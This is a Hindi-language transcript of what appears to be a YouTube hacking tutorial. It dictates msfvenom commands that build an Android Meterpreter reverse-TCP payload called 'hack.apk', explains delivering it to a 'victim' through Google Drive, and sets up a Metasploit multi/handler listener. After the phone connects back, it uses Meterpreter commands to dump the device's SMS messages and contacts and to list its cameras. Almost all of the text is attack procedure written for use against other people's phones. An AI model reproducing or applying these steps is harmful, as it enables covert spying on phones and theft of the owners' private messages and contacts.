आपने अभी तक अगर चैनल को सब्सक्राइब नहीं किया तो पहले चैनल को सब्सक्राइब कर लें और बेल आइकन को प्रेस करें ताकि आपको ऐसे ही वीडियो का अपडेट तुरंत मिले। तो सबसे पहले हमें टर्मिनल विंडो ओपन करनी है और यहाँ पर हम एक पेलोड बनाएंगे एंड्राइड के लिए। तो हम टाइप करेंगे msf venom hyphen p एंड्राइड / मेटरप्रेटर / रिवर्स _ tcp। अब हम lhost टाइप करेंगे। अगर आपको lhost नहीं पता है तो दूसरे टर्मिनल विंडो ओपन कीजिए और यहाँ पर हम टाइप करेंगे ifconfig। ये देखिए आपको यहाँ पर आईपी एड्रेस शो करेगा। ये हमारा आईपी एड्रेस है, इसको मैंने कॉपी कर लिया और यहाँ पर इसे मैंने पेस्ट कर दिया। अब हम एल पोर्टल सेट करेंगे तो 4444 हमारा एल पोर्टल है। अब उसके बाद हम रॉ पेलोड बनाएंगे, ग्रेटर देन का साइन। अब हम इस फाइल को कोई नाम देंगे, तो मैं एंड्रॉइड के लिए बना रहा हूँ तो मैं यहाँ पे टाइप करूँगा hack.apk और इसे एंटर करूँगा मैं। अब यहाँ पर आप देखिएगा ये फाइल आपको जनरेट हो रही है। अब जनरेट हो के आपको यहाँ पे शॉर्टकट दिखेगा, आपको ये थोड़ा टाइम लेगा। ये देखिए आपका फाइल जनरेट हो चुका है और ये फाइल आपको मिलेगी आपके रूट फोल्डर के अंदर। ये देखिए हमारा hack.apk एंड्रॉइड फाइल है जो हमने बनाई है। अब आपको इसको विक्टम के फ़ोन पे भेजना है तो आप इसे ड्राइव के थ्रू भेज सकते हैं। मैं इसे गूगल ड्राइव के थ्रू भेज रहा हूँ विक्टिम के मोबाइल पर, मेल आईडी पर। अब हमें मेटा स्प्लाइट फ्रेमवर्क को ओपन करना है तो हम यहाँ पर कमांड लगाएंगे msf console enter। ये देखिए हमारे पास मेटा स्प्लाइट फ्रेमवर्क ओपन होगा। अभी थोड़ा वेट करेंगे। ये देखिए हमारे पास ये मेटा स्प्लाइट फ्रेमवर्क ऑन हो चुका है। इट विल टेक टाइम, ऑन हो ही रहा है अभी। ये अब हुआ, ये ऑन होने के बाद अब कमांड हम लगाएंगे यूज मल्टी / हैंडलर और एंटर करेंगे। उसके बाद हम टाइप करेंगे सेट पेलोड एंड्रॉइड / मेटरप्रेटर / रिवर्स _ tcp और एंटर करना है हमें। अब हम यहाँ पर एल होस्ट टाइप करेंगे जो हमारा आईपी एड्रेस था, तो सेट एल होस्ट, आईपी को मैंने कॉपी किया और यहाँ पर कॉपी करके इसे पेस्ट करना है। तो लिया कॉपी मैंने और यहाँ पर मैंने पेस्ट कर दिया। अब एंटर किया। अब एल पोर्ट हम लोग को सेट करना है तो एल पोर्ट जो मैंने टाइप किया था 4444 और एंटर करा। अब इसके बाद एक कमांड देना है मेरे को। उसके बाद विक्टिम जैसे ही वो एप्लीकेशन को ओपन करेगा तो हमारे पास सारा कंट्रोल आ जाएगा। तो टाइप करेंगे हम एक्सप्लाइट और एंटर करा। तो अब ये वेट कर रहा है तो मैं अपने फ़ोन से उस एप्लीकेशन को इंस्टॉल कर ले रहा हूँ। और जैसे ही मैं इंस्टॉल करूँगा अपने फ़ोन से उस एप्लीकेशन को तो यहाँ पर ऑटोमेटिकली शो करेगा आपको। ये देखिए मैंने यहाँ से इंस्टॉल कर लिया। अब देखिए जैसे ही मैंने एप्लीकेशन को जैसे ही ओपन किया यहाँ पे अब पूरा कंट्रोल हमारे पास आ चुका है। तो अब अगर देखना है हमें तो हम यहाँ पर टाइप करेंगे sysinfo
तो आपको देखिए ये एंट्री मिल गया, यहाँ पर आपको वर्जन्स वगैरह मिल गए। एंड्रॉयड वर्जन मेरा 9.5 है, ठीक है, तो ये सारा आपको मिल गया। यहाँ पर दूसरा कमांड हम लगाते हैं, अगर SMS वगैरह लेना है तो मैसेजेस की जानकारी लेने के लिए हम टाइप करेंगे dumb SMS और एंटर जैसे ही करा मैंने तो हमारे पास सारा डेटा आ गया यहाँ पर कंप्यूटर के अंदर, रूट फोल्डर के अंदर। ये देखिए हमारे पास है, ये सारा मैसेजेस फ़ोन का हमारे कंप्यूटर में आपको शो कर रहा है। यहाँ पर सारे मैसेजेस आएंगे ऑफलाइन, व्हाट्सएप वाले नहीं, जो आपके फ़ोन में ऑफलाइन जो मैसेजेस होते हैं। अब अगर आपको और कुछ देखना है तो यहाँ पर कमांड लगाएंगे हम। अब अगर देखना कॉन्टैक्ट तो हम कमांड लगाया डंप स्पेस कॉन्टैक्ट, एंटर करा तो देखिए जैसे एंटर करा वैसे ही रूट फोल्डर में वो बन के आएगा। ये थोड़ा टाइम लगेगा, ये हमारे पास आ चुका है रूट फोल्डर में। देखिए ये कॉन्टैक्ट सारे आ चुके हैं, जैसे एंटर करेंगे ये सारे कॉन्टैक्ट के लिस्ट हमारे पास हैं। आप इजीली देख सकते हैं जितने भी कॉन्टैक्ट उसके फ़ोन में, यानी मेरे फ़ोन में जो अभी शो कर रहा है वो सारा मेरे फ़ोन का कॉन्टैक्ट यहाँ पर आपको दिख रहा है। अब अगर और कोई कमांड लगाना है, लाइक अगर कैमरा चेक करना चाहते हैं या फिर हम चेक कर रहे हैं अभी उसका फ़ोन रूट है कि नहीं, तो हम कमांड लिख रहे हैं चेक रूट और करा इंटर, तो आप देख सकते हैं यहाँ पर आपको शो कर रहा है कि डिवाइस इज़ नॉट रूटेड, तो मेरा फ़ोन रूट नहीं है। अब हमको देखना कैमरा, तो हम कमांड लगाएंगे वेबकैम लिस्ट और एंटर करा। तो जैसे एंटर करा मैंने यहाँ पर ये देखिए शो कर रहा है कि मेरे फ़ोन में दो कैमरे हैं, एक बैक और एक फ्रंट कैमरा। अब यहाँ से अगर और भी कुछ देखना है तो हम सिंपली हेल्प लिखेंगे और यहाँ पर जितने भी कमांड है उसके थ्रू आप उसको चेक कर सकते हैं। तो इट इज़ क्वाइट ईजी, ये देखिए आपका पूरा हेल्प फाइल खुल चुका है। तो अगर वीडियो अच्छा लगा हो तो लाइक ज़रूर करें और शेयर ज़रूर करें एंड कीप सपोर्टिंग। जय हिंद, जय भारत, थैंक यू।